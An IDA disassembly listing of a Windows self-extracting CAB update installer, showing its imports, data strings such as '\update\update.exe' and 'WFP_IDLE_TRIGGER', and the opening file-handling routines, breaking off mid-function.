;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : E07C29C4AE80A755F622D61D3D788EDC
; File Name : u:\work\e07c29c4ae80a755f622d61d3d788edc_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 1000000
; Section 1. (virtual address 00002000)
; Virtual size : 000055C2 ( 21954.)
; Section size in file : 00005600 ( 22016.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
;
; Imports from ADVAPI32.dll
;
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Externs
; _idata
; BOOL __stdcall OpenProcessToken(HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle)
extrn OpenProcessToken:dword ; CODE XREF: sub_1002FAA+4E�p
; DATA XREF: sub_1002FAA+4E�r
; BOOL __stdcall InitializeSecurityDescriptor(PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD dwRevision)
extrn InitializeSecurityDescriptor:dword ; CODE XREF: sub_100369E+7D�p
; DATA XREF: sub_100369E+7D�r
; BOOL __stdcall InitializeAcl(PACL pAcl, DWORD nAclLength, DWORD dwAclRevision)
extrn InitializeAcl:dword ; CODE XREF: sub_100369E+95�p
; DATA XREF: sub_100369E+95�r
; BOOL __stdcall AddAccessAllowedAce(PACL pAcl, DWORD dwAceRevision, DWORD AccessMask, PSID pSid)
extrn AddAccessAllowedAce:dword ; CODE XREF: sub_100369E+B7�p
; sub_100369E+CA�p ...
; BOOL __stdcall SetSecurityDescriptorDacl(PSECURITY_DESCRIPTOR pSecurityDescriptor, BOOL bDaclPresent, PACL pDacl, BOOL bDaclDefaulted)
extrn SetSecurityDescriptorDacl:dword ; CODE XREF: sub_100369E+F2�p
; DATA XREF: sub_100369E+F2�r
; BOOL __stdcall CryptAcquireContextA(HCRYPTPROV *phProv, LPCSTR pszContainer, LPCSTR pszProvider, DWORD dwProvType, DWORD dwFlags)
extrn CryptAcquireContextA:dword ; CODE XREF: sub_100369E+259�p
; DATA XREF: sub_100369E+259�r
; BOOL __stdcall InitiateSystemShutdownA(LPSTR lpMachineName, LPSTR lpMessage, DWORD dwTimeout, BOOL bForceAppsClosed, BOOL bRebootAfterShutdown)
extrn InitiateSystemShutdownA:dword ; CODE XREF: sub_1002D83+AF�p
; DATA XREF: sub_1002D83+AF�r
; DWORD __stdcall GetLengthSid(PSID pSid)
extrn GetLengthSid:dword ; CODE XREF: sub_1002FAA+8D�p
; sub_1002FAA+DC�p
; DATA XREF: ...
; BOOL __stdcall GetTokenInformation(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength)
extrn GetTokenInformation:dword ; CODE XREF: sub_1002FAA+7A�p
; sub_1002FAA+D0�p
; DATA XREF: ...
; BOOL __stdcall AllocateAndInitializeSid(PSID_IDENTIFIER_AUTHORITY pIdentifierAuthority, BYTE nSubAuthorityCount, DWORD nSubAuthority0, DWORD nSubAuthority1, DWORD nSubAuthority2, DWORD nSubAuthority3, DWORD nSubAuthority4, DWORD nSubAuthority5, DWORD nSubAuthority6, DWORD nSubAuthority7, PSID *pSid)
extrn AllocateAndInitializeSid:dword ; CODE XREF: sub_1002FAA+37�p
; DATA XREF: sub_1002FAA+37�r
; BOOL __stdcall CryptReleaseContext(HCRYPTPROV hProv, DWORD dwFlags)
extrn CryptReleaseContext:dword ; CODE XREF: sub_100369E+313�p
; DATA XREF: sub_100369E+313�r
; BOOL __stdcall CryptGenRandom(HCRYPTPROV hProv, DWORD dwLen, BYTE *pbBuffer)
extrn CryptGenRandom:dword ; CODE XREF: sub_100369E+27C�p
; DATA XREF: sub_100369E+27C�r
;
; Imports from COMCTL32.dll
;
; void __stdcall InitCommonControls()
extrn InitCommonControls:dword ; CODE XREF: start_0+30�p
; DATA XREF: start_0+30�r
;
; Imports from KERNEL32.dll
;
; HANDLE __stdcall CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName)
extrn CreateEventA:dword ; CODE XREF: start_0+7C�p
; DATA XREF: start_0+7C�r
; HANDLE __stdcall GetProcessHeap()
extrn GetProcessHeap:dword ; CODE XREF: start_0+36�p
; DATA XREF: start_0+36�r
; BOOL __stdcall GetVersionExA(LPOSVERSIONINFOA lpVersionInformation)
extrn GetVersionExA:dword ; CODE XREF: sub_1002D83+D0�p
; sub_1002D83+E3�p
; DATA XREF: ...
; BOOL __stdcall ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped)
extrn ReadFile:dword ; CODE XREF: sub_10023BC+32�p
; sub_100280D+4C�p ...
; DWORD __stdcall SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod)
extrn SetFilePointer:dword ; CODE XREF: sub_10023BC+16�p
; sub_10024E0+1E�p ...
; BOOL __stdcall HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem)
extrn HeapFree:dword ; CODE XREF: sub_10024AE+C�p
; DATA XREF: sub_10024AE+C�r
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword ; CODE XREF: sub_10024C1+6�p
; sub_10025BE+1B�p ...
; DWORD __stdcall FormatMessageA(DWORD dwFlags, LPCVOID lpSource, DWORD dwMessageId, DWORD dwLanguageId, LPSTR lpBuffer, DWORD nSize, va_list *Arguments)
extrn FormatMessageA:dword ; CODE XREF: sub_1002556+50�p
; DATA XREF: sub_1002556+50�r
; void __stdcall LeaveCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn LeaveCriticalSection:dword ; CODE XREF: sub_10025BE+F1�p
; DATA XREF: sub_10025BE+F1�r
; BOOL __stdcall RemoveDirectoryA(LPCSTR lpPathName)
extrn RemoveDirectoryA:dword ; CODE XREF: sub_10025BE+88�p
; sub_10025BE+CF�p
; DATA XREF: ...
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: sub_10025BE+4C�p
; sub_10025BE+8E�p ...
; BOOL __stdcall DeleteFileA(LPCSTR lpFileName)
extrn DeleteFileA:dword ; CODE XREF: sub_10025BE+42�p
; DATA XREF: sub_10025BE+42�r
; BOOL __stdcall MoveFileExA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName, DWORD dwFlags)
extrn MoveFileExA:dword ; CODE XREF: sub_10025BE+62�p
; sub_10025BE+A5�p ...
; void __stdcall EnterCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn EnterCriticalSection:dword ; CODE XREF: sub_10025BE+9�p
; DATA XREF: sub_10025BE+9�r
; BOOL __stdcall TerminateProcess(HANDLE hProcess, UINT uExitCode)
extrn TerminateProcess:dword ; CODE XREF: sub_10026BA+67�p
; DATA XREF: sub_10026BA+67�r
; BOOL __stdcall SetEvent(HANDLE hEvent)
extrn SetEvent:dword ; CODE XREF: sub_10026BA+48�p
; DATA XREF: sub_10026BA+48�r
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: sub_10026BA+3C�p
; sub_1002D83:loc_1002DD6�p ...
; BOOL __stdcall SetEnvironmentVariableA(LPCSTR lpName, LPCSTR lpValue)
extrn SetEnvironmentVariableA:dword ; CODE XREF: sub_100280D+2F0�p
; sub_1002BF1+A8�p ...
; DWORD __stdcall GetEnvironmentVariableA(LPCSTR lpName, LPSTR lpBuffer, DWORD nSize)
extrn GetEnvironmentVariableA:dword ; CODE XREF: sub_100280D+2A2�p
; sub_1002BF1+B�p
; DATA XREF: ...
; int __stdcall WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cchMultiByte, LPCSTR lpDefaultChar, LPBOOL lpUsedDefaultChar)
extrn WideCharToMultiByte:dword ; CODE XREF: sub_100280D+268�p
; sub_100280D+29B�p ...
; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, DWORD dwBytes)
extrn HeapAlloc:dword ; CODE XREF: sub_100280D+F3�p
; sub_100280D+283�p ...
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
extrn CreateFileA:dword ; CODE XREF: sub_100280D+1F�p
; sub_1002BF1+41�p ...
; BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped)
extrn WriteFile:dword ; CODE XREF: sub_1002BF1+91�p
; sub_1002F82+12�p
; DATA XREF: ...
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: sub_1002CB9+97�p
; start_0+52F�p
; DATA XREF: ...
; void __stdcall DeleteCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn DeleteCriticalSection:dword ; CODE XREF: sub_1002CB9+89�p
; start_0+51F�p
; DATA XREF: ...
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn FreeLibrary:dword ; CODE XREF: sub_1002D83+15F�p
; DATA XREF: sub_1002D83+15F�r
; BOOL __stdcall FlushFileBuffers(HANDLE hFile)
extrn FlushFileBuffers:dword ; CODE XREF: sub_1002D83+13A�p
; DATA XREF: sub_1002D83+13A�r
; UINT __stdcall GetSystemDirectoryA(LPSTR lpBuffer, UINT uSize)
extrn GetSystemDirectoryA:dword ; CODE XREF: sub_1002D83+F7�p
; sub_100369E+12F�p
; DATA XREF: ...
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, DWORD dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
extrn CreateThread:dword ; CODE XREF: start_0+95�p
; DATA XREF: start_0+95�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_1002D83+8A�p
; sub_10035EA+8A�p
; DATA XREF: ...
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_1002D83+77�p
; sub_10035EA+7A�p
; DATA XREF: ...
; DWORD __stdcall WaitForSingleObject(HANDLE hHandle, DWORD dwMilliseconds)
extrn WaitForSingleObject:dword ; CODE XREF: sub_1002D83+33�p
; start_0+AB�p ...
; HANDLE __stdcall OpenEventA(DWORD dwDesiredAccess, BOOL bInheritHandle, LPCSTR lpName)
extrn OpenEventA:dword ; CODE XREF: sub_1002D83+21�p
; DATA XREF: sub_1002D83+21�r
; HANDLE __stdcall GetCurrentProcess()
extrn GetCurrentProcess:dword ; CODE XREF: sub_1002FAA+47�p
; DATA XREF: sub_1002FAA+47�r
; DWORD __stdcall GetFileAttributesA(LPCSTR lpFileName)
extrn GetFileAttributesA:dword ; CODE XREF: sub_1003272+21E�p
; sub_10035EA+66�p
; DATA XREF: ...
; LPSTR __stdcall GetCommandLineA()
extrn GetCommandLineA:dword ; CODE XREF: sub_1003272+50�p
; DATA XREF: sub_1003272+50�r
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPSTR lpFilename, DWORD nSize)
extrn GetModuleFileNameA:dword ; CODE XREF: sub_1003272+15�p
; DATA XREF: sub_1003272+15�r
; BOOL __stdcall CreateDirectoryA(LPCSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes)
extrn CreateDirectoryA:dword ; CODE XREF: sub_1003596+26�p
; DATA XREF: sub_1003596+26�r
; BOOL __stdcall SystemTimeToFileTime(const SYSTEMTIME *lpSystemTime, LPFILETIME lpFileTime)
extrn SystemTimeToFileTime:dword ; CODE XREF: sub_100369E+343�p
; DATA XREF: sub_100369E+343�r
; void __stdcall GetSystemTime(LPSYSTEMTIME lpSystemTime)
extrn GetSystemTime:dword ; CODE XREF: sub_100369E+335�p
; DATA XREF: sub_100369E+335�r
; BOOL __stdcall GetDiskFreeSpaceA(LPCSTR lpRootPathName, LPDWORD lpSectorsPerCluster, LPDWORD lpBytesPerSector, LPDWORD lpNumberOfFreeClusters, LPDWORD lpTotalNumberOfClusters)
extrn GetDiskFreeSpaceA:dword ; CODE XREF: sub_100369E+1C4�p
; DATA XREF: sub_100369E+1C4�r
; DWORD __stdcall QueryDosDeviceA(LPCSTR lpDeviceName, LPSTR lpTargetPath, DWORD ucchMax)
extrn QueryDosDeviceA:dword ; CODE XREF: sub_100369E+17C�p
; DATA XREF: sub_100369E+17C�r
; UINT __stdcall GetDriveTypeA(LPCSTR lpRootPathName)
extrn GetDriveTypeA:dword ; CODE XREF: sub_100369E+14D�p
; DATA XREF: sub_100369E+14D�r
; DWORD __stdcall GetCurrentDirectoryA(DWORD nBufferLength, LPSTR lpBuffer)
extrn GetCurrentDirectoryA:dword ; CODE XREF: sub_100369E+11A�p
; DATA XREF: sub_100369E+11A�r
; BOOL __stdcall SetFileTime(HANDLE hFile, const FILETIME *lpCreationTime, const FILETIME *lpLastAccessTime, const FILETIME *lpLastWriteTime)
extrn SetFileTime:dword ; CODE XREF: sub_1003AE1+62�p
; DATA XREF: sub_1003AE1+62�r
; BOOL __stdcall LocalFileTimeToFileTime(const FILETIME *lpLocalFileTime, LPFILETIME lpFileTime)
extrn LocalFileTimeToFileTime:dword ; CODE XREF: sub_1003AE1+4D�p
; DATA XREF: sub_1003AE1+4D�r
; BOOL __stdcall DosDateTimeToFileTime(WORD wFatDate, WORD wFatTime, LPFILETIME lpFileTime)
extrn DosDateTimeToFileTime:dword ; CODE XREF: sub_1003AE1+3F�p
; DATA XREF: sub_1003AE1+3F�r
; BOOL __stdcall GetExitCodeProcess(HANDLE hProcess, LPDWORD lpExitCode)
extrn GetExitCodeProcess:dword ; CODE XREF: start_0+457�p
; DATA XREF: start_0+457�r
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation)
extrn CreateProcessA:dword ; CODE XREF: start_0+410�p
; DATA XREF: start_0+410�r
; BOOL __stdcall InitializeCriticalSectionAndSpinCount(LPCRITICAL_SECTION lpCriticalSection, DWORD dwSpinCount)
extrn InitializeCriticalSectionAndSpinCount:dword ; CODE XREF: start_0+21�p
; DATA XREF: start_0+21�r
;
; Imports from SHELL32.dll
;
; LPITEMIDLIST __stdcall SHBrowseForFolderA(LPBROWSEINFOA lpbi)
extrn SHBrowseForFolderA:dword ; CODE XREF: DialogFunc+95�p
; DATA XREF: DialogFunc+95�r
; BOOL __stdcall SHGetPathFromIDListA(LPCITEMIDLIST pidl, LPSTR pszPath)
extrn SHGetPathFromIDListA:dword ; CODE XREF: DialogFunc+A7�p
; DATA XREF: DialogFunc+A7�r
;
; Imports from USER32.dll
;
; int __stdcall DialogBoxParamA(HINSTANCE hInstance, LPCSTR lpTemplateName, HWND hWndParent, DLGPROC lpDialogFunc, LPARAM dwInitParam)
extrn DialogBoxParamA:dword ; CODE XREF: StartAddress+11�p
; sub_100369E+3BC�p
; DATA XREF: ...
; int __stdcall LoadStringA(HINSTANCE hInstance, UINT uID, LPSTR lpBuffer, int nBufferMax)
extrn LoadStringA:dword ; CODE XREF: sub_1002556+1F�p
; sub_1002CB9+4F�p ...
; BOOL __stdcall EndDialog(HWND hDlg, int nResult)
extrn EndDialog:dword ; CODE XREF: sub_10026BA+7F�p
; DialogFunc+165�p
; DATA XREF: ...
; HWND __stdcall SetParent(HWND hWndChild, HWND hWndNewParent)
extrn SetParent:dword ; CODE XREF: sub_10026BA+2C�p
; start_0+F6�p
; DATA XREF: ...
; int __stdcall MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType)
extrn MessageBoxA:dword ; CODE XREF: sub_1002CB9+6B�p
; start_0+4B7�p
; DATA XREF: ...
; LRESULT __stdcall SendMessageA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
extrn SendMessageA:dword ; CODE XREF: DialogFunc+C9�p
; DialogFunc+132�p
; DATA XREF: ...
; LONG __stdcall SendDlgItemMessageA(HWND hDlg, int nIDDlgItem, UINT Msg, WPARAM wParam, LPARAM lParam)
extrn SendDlgItemMessageA:dword ; CODE XREF: DialogFunc+BE�p
; DialogFunc+F1�p ...
; BOOL __stdcall ShowWindow(HWND hWnd, int nCmdShow)
extrn ShowWindow:dword ; CODE XREF: start_0+E4�p start_0+22F�p ...
;
; Imports from msvcrt.dll
;
; char *__cdecl strchr(const char *, int)
extrn strchr:dword ; CODE XREF: sub_1002D83+10A�p
; DATA XREF: sub_1002D83+10A�r
; int sprintf(char *, const char *, ...)
extrn sprintf:dword ; CODE XREF: sub_100369E+290�p
; sub_100369E+2BA�p
; DATA XREF: ...
; char *__cdecl strstr(const char *, const char *)
extrn strstr:dword ; CODE XREF: sub_100369E+1A4�p
; sub_1003AE1+123�p ...
; char *__cdecl strlwr(char *)
extrn _strlwr:dword ; CODE XREF: sub_100369E+19C�p
; DATA XREF: sub_100369E+19C�r
; char *__cdecl strncpy(char *, const char *, size_t)
extrn strncpy:dword ; CODE XREF: sub_100369E+15F�p
; DATA XREF: sub_100369E+15F�r
;
; Imports from ntdll.dll
;
extrn NtShutdownSystem:dword ; CODE XREF: sub_1002D83+14F�p
; DATA XREF: sub_1002D83+14F�r
extrn NtOpenProcessToken:dword ; CODE XREF: sub_1002B1C+38�p
; sub_1002BA0+14�p
; DATA XREF: ...
extrn NtAdjustPrivilegesToken:dword ; CODE XREF: sub_1002B1C+5F�p
; sub_1002BA0+28�p
; DATA XREF: ...
extrn NtClose:dword ; CODE XREF: sub_1002B1C+6C�p
; sub_1002B1C:loc_1002B93�p ...
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 1002160h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dd 5 dup(0)
dd 3EA7279Ch, 0
dd 2, 1Bh, 23A0h, 7A0h
dword_100218C dd 0A80E9DC0h, 11D2D910h, 10000595h, 15B1AA5Ahdword_100219C dd 0 ; sub_1003272:loc_1003390�o ...
dword_10021A0 dd 74687324h, 246E7764h, 7165722Eh, 0; char Name[]
Name db '_SFX_CAB_SHUTDOWN_REQUEST',0 ; DATA XREF: sub_1002BF1+6�o
; sub_1002BF1+A3�o
align 4
; char ProcName[]
ProcName db 'InitiateSystemShutdownExA',0 ; DATA XREF: sub_1002D83+84�o
align 4
; char LibFileName[]
LibFileName db 'advapi32.dll',0 ; DATA XREF: sub_1002D83+72�o
; sub_10035EA+75�o
align 4
; char aWfp_idle_trigg[]
aWfp_idle_trigg db 'WFP_IDLE_TRIGGER',0 ; DATA XREF: sub_1002D83+D�o
align 4
; char aDecryptfilea[]
aDecryptfilea db 'DecryptFileA',0 ; DATA XREF: sub_10035EA+84�o
align 4
aTempExt db 'temp\ext',0 ; DATA XREF: sub_100369E+321�o
align 4
; char a02x[]
a02x db '%02x',0 ; DATA XREF: sub_100369E+2B4�o
align 10h
; char aS[]
aS db '%s',0 ; DATA XREF: sub_100369E+28A�o
align 4
; char aBackofficestor[]
aBackofficestor db 'backofficestorage',0 ; DATA XREF: sub_100369E+196�o
align 4
; char aCdtag_1[]
aCdtag_1 db 'cdtag.1',0 ; DATA XREF: sub_1003AE1+11B�o
; char a_sfx_cab_exe_p[]
a_sfx_cab_exe_p db '_SFX_CAB_EXE_PATH',0 ; DATA XREF: start_0+387�o
align 4
; char aUpdateUpdate_e[]
aUpdateUpdate_e db '\update\update.exe',0 ; DATA XREF: start_0+374�o
align 4
byte_1002278 db 0 ; DATA XREF: sub_1005618+1D�r
; sub_1005C06+15C�r ...
align 4
dd 2020101h, 4040303h, 6060505h, 8080707h, 0A0A0909h, 0C0C0B0Bh
dd 0E0E0D0Dh, 10100F0Fh, 3 dup(11111111h), 111111h, 0
dword_10022B0 dd 0FFFFFFFEh ; sub_1005E5D:loc_100600E�r ...
dd 0FFFFFFFFh, 0
dword_10022BC dd 1 dd 2, 4, 6, 0Ah, 0Eh, 16h, 1Eh, 2Eh, 3Eh, 5Eh, 7Eh, 0BEh
dd 0FEh, 17Eh, 1FEh, 2FEh, 3FEh, 5FEh, 7FEh, 0BFEh, 0FFEh
dd 17FEh, 1FFEh, 2FFEh, 3FFEh, 5FFEh, 7FFEh, 0BFFEh, 0FFFEh
dd 17FFEh, 1FFFEh, 2FFFEh, 3FFFEh, 5FFFEh, 7FFFEh, 9FFFEh
dd 0BFFFEh, 0DFFFEh, 0FFFFEh, 11FFFEh, 13FFFEh, 15FFFEh
dd 17FFFEh, 19FFFEh, 1BFFFEh, 1DFFFEh, 1FFFFEh, 3020100h
dd 7060504h, 0B0A0908h, 0F0E0D0Ch
db 10h
byte_100238D db 0 ; DATA XREF: sub_100676D+1A2�r
; sub_100676D+1E2�r
dw 201h
dd 6050403h, 0A090807h, 0E0D0C0Bh, 100Fh, 3031424Eh, 0
dd 3EA7279Ch, 1, 63786673h, 702E6261h, 6264h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10023BC proc near ; CODE XREF: start_0+46F�p
NumberOfBytesRead= dword ptr -4
push ebp
mov ebp, esp
push ecx
mov eax, hFile
cmp eax, 0FFFFFFFFh
jz short locret_1002449
push ebx
push esi
xor ebx, ebx
push ebx ; dwMoveMethod
push ebx ; lpDistanceToMoveHigh
push ebx ; lDistanceToMove
push eax ; hFile
call ds:SetFilePointer ; SetFilePointer
push ebx ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
mov esi, 210h
push esi ; nNumberOfBytesToRead
push offset dword_1008440 ; lpBuffer
push hFile ; hFile
call ds:ReadFile ; ReadFile
test eax, eax
jz short loc_1002440
cmp [ebp+NumberOfBytesRead], esi
jnz short loc_1002440
cmp dword_1008440, 6E776453h
jnz short loc_1002440
test byte ptr dword_1008448+3, 80h
jnz short loc_1002447
or byte ptr dword_1008448+3, 40h
cmp dword_1008444, 10000h
mov byte_100864F, bl
jnz short loc_1002447
test dword_1008448, 3FFFFFECh
jnz short loc_1002447
and byte ptr dword_1008448+3, 0BFh
jmp short loc_1002447
; ---------------------------------------------------------------------------
loc_1002440: ; CODE XREF: sub_10023BC+3A�j
; sub_10023BC+3F�j ...
or byte ptr dword_1008448+3, 80h
loc_1002447: ; CODE XREF: sub_10023BC+54�j
; sub_10023BC+6D�j ...
pop esi
pop ebx
locret_1002449: ; CODE XREF: sub_10023BC+C�j
leave
retn
sub_10023BC endp
; =============== S U B R O U T I N E =======================================
sub_100244B proc near ; CODE XREF: sub_1002BF1+2B�p
; sub_100369E+32A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
mov esi, [esp+8+arg_0]
mov eax, esi
push edi
lea ecx, [eax+1]
loc_1002457: ; CODE XREF: sub_100244B+11�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_1002457
mov edi, [esp+0Ch+arg_8]
sub eax, ecx
mov ecx, eax
shr ecx, 2
lea edx, [eax+edi]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
cmp byte ptr [edx-1], 5Ch
jz short loc_100247F
mov byte ptr [edx], 5Ch
inc edx
loc_100247F: ; CODE XREF: sub_100244B+2E�j
mov eax, [esp+0Ch+arg_4]
lea esi, [eax+1]
loc_1002486: ; CODE XREF: sub_100244B+40�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_1002486
sub eax, esi
mov esi, [esp+0Ch+arg_4]
lea ecx, [eax+1]
mov ebx, ecx
shr ecx, 2
mov edi, edx
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
pop edi
pop esi
add eax, edx
pop ebx
retn 0Ch
sub_100244B endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_10024AE(LPVOID lpMem)
sub_10024AE proc near ; DATA XREF: start_0+1DF�o
lpMem = dword ptr 4
push [esp+lpMem] ; lpMem
push 0 ; dwFlags
push hHeap ; hHeap
call ds:HeapFree
retn
sub_10024AE endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_10024C1(HANDLE hObject)
sub_10024C1 proc near ; DATA XREF: start_0+1CB�o
hObject = dword ptr 4
push esi
mov esi, [esp+4+hObject]
push esi ; hObject
call ds:CloseHandle ; CloseHandle
cmp hObject, esi
pop esi
jnz short loc_10024DD
and hObject, 0
loc_10024DD: ; CODE XREF: sub_10024C1+13�j
xor eax, eax
retn
sub_10024C1 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_10024E0(HANDLE hFile, LONG lDistanceToMove, DWORD dwMoveMethod)
sub_10024E0 proc near ; CODE XREF: start_0+1F8�p
; DATA XREF: start_0+1C6�o
hFile = dword ptr 4
lDistanceToMove = dword ptr 8
dwMoveMethod = dword ptr 0Ch
cmp [esp+dwMoveMethod], 0
mov eax, [esp+lDistanceToMove]
jnz short loc_10024F3
mov ecx, lDistanceToMove
add eax, ecx
loc_10024F3: ; CODE XREF: sub_10024E0+9�j
push [esp+dwMoveMethod] ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
push eax ; lDistanceToMove
push [esp+0Ch+hFile] ; hFile
call ds:SetFilePointer ; SetFilePointer
sub eax, lDistanceToMove
retn
sub_10024E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100250B proc near ; CODE XREF: sub_1002556+5E�p
; sub_100369E+35A�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
test eax, eax
lea ecx, [ebp+var_C]
jnz short loc_1002524
mov eax, [ebp+arg_4]
mov byte ptr [eax], 30h
inc eax
jmp short loc_100254F
; ---------------------------------------------------------------------------
loc_1002524: ; CODE XREF: sub_100250B+E�j
push esi
loc_1002525: ; CODE XREF: sub_100250B+29�j
xor edx, edx
push 0Ah
pop esi
div esi
add dl, 30h
mov [ecx], dl
inc ecx
test eax, eax
jnz short loc_1002525
lea eax, [ebp+var_C]
dec ecx
cmp ecx, eax
mov eax, [ebp+arg_4]
pop esi
jb short loc_100254F
loc_1002542: ; CODE XREF: sub_100250B+42�j
mov dl, [ecx]
mov [eax], dl
inc eax
dec ecx
lea edx, [ebp+var_C]
cmp ecx, edx
jnb short loc_1002542
loc_100254F: ; CODE XREF: sub_100250B+17�j
; sub_100250B+35�j
and byte ptr [eax], 0
leave
retn 8
sub_100250B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_1002556(UINT dwMessageId, int nSize, LPSTR lpBuffer)
sub_1002556 proc near ; CODE XREF: sub_1002CB9+32�p
Arguments = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
dwMessageId = dword ptr 8
nSize = dword ptr 0Ch
lpBuffer = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
mov esi, [ebp+dwMessageId]
test esi, 20000000h
jz short loc_100257F
push [ebp+nSize] ; nBufferMax
push [ebp+lpBuffer] ; lpBuffer
push esi ; uID
push hInstance ; hInstance
call ds:LoadStringA ; LoadStringA
test eax, eax
jnz short loc_10025B9
loc_100257F: ; CODE XREF: sub_1002556+10�j
mov eax, dword_100876C
mov [ebp+Arguments], eax
mov eax, offset dword_100219C
mov [ebp+var_8], eax
mov [ebp+var_4], eax
lea eax, [ebp+Arguments]
push eax ; Arguments
push [ebp+nSize] ; nSize
push [ebp+lpBuffer] ; lpBuffer
push 0 ; dwLanguageId
push esi ; dwMessageId
push 0 ; lpSource
push 3000h ; dwFlags
call ds:FormatMessageA ; FormatMessageA
test eax, eax
jnz short loc_10025B9
push [ebp+lpBuffer]
push esi
call sub_100250B
loc_10025B9: ; CODE XREF: sub_1002556+27�j
; sub_1002556+58�j
pop esi
leave
retn 0Ch
sub_1002556 endp
; =============== S U B R O U T I N E =======================================
sub_10025BE proc near ; CODE XREF: sub_10026BA+56�p
; sub_1002CB9:loc_1002D2A�p ...
push ebx
push ebp
push esi
push edi
push offset CriticalSection ; lpCriticalSection
call ds:EnterCriticalSection
mov eax, hObject
xor ebp, ebp
cmp eax, ebp
jz short loc_10025E5
push eax ; hObject
call ds:CloseHandle ; CloseHandle
mov hObject, ebp
loc_10025E5: ; CODE XREF: sub_10025BE+18�j
mov esi, off_1008000
mov ebx, ds:MoveFileExA
mov edi, offset off_1008000
jmp short loc_1002627
; ---------------------------------------------------------------------------
loc_10025F8: ; CODE XREF: sub_10025BE+6B�j
mov eax, [esi+4]
cmp eax, ebp
jz short loc_1002625
push eax ; lpFileName
call ds:DeleteFileA ; DeleteFileA
test eax, eax
jnz short loc_1002622
call ds:GetLastError
cmp eax, 2
jz short loc_1002622
